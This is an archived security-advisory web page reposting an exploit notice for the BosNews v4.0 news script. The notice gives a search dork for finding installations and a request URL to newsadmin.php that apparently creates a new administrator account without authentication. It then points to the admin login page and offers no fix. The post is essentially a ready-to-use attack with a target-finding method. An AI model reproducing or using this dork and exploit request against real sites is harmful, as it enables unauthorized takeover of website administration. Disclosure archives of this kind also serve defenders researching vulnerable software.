Computer Security

Security Advisory: BosNews v4.0 Remote add user admin
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BosNews 2002-2006 Remote add user admin

  Dotclear 'ecrire/images.
php' Arbitrary File Upload Vulnerability

  KwsPHP (Upload) Remote Code Execution Exploit

  S21SEC-041-en:
Cezanne SW Cross-Site Scripting

From:houssamix_(at)_hotmail.fr <houssamix_(at)_hotmail.fr>
Date:15.04.2008
Subject:BosNews v4.0 Remote add user admin

---------------------------------------------------------------------------------
-----------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
---------------------------------------------------------
---------------------------------------------------------------------------------
-----------------------------

= Author : HouSSaMix                          
= Script : BosNews
= version : 4.0
= Download : http://www.bosdev.com/

= Dork : Powered by BosNews
                                                                                 
 
= BUG  :  Remote add user admin

exploit => Target.com/path/newsadmin.php?action=create_account

here u can add a new user admin

= admin login

Target.com/path/newsadmin.php
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru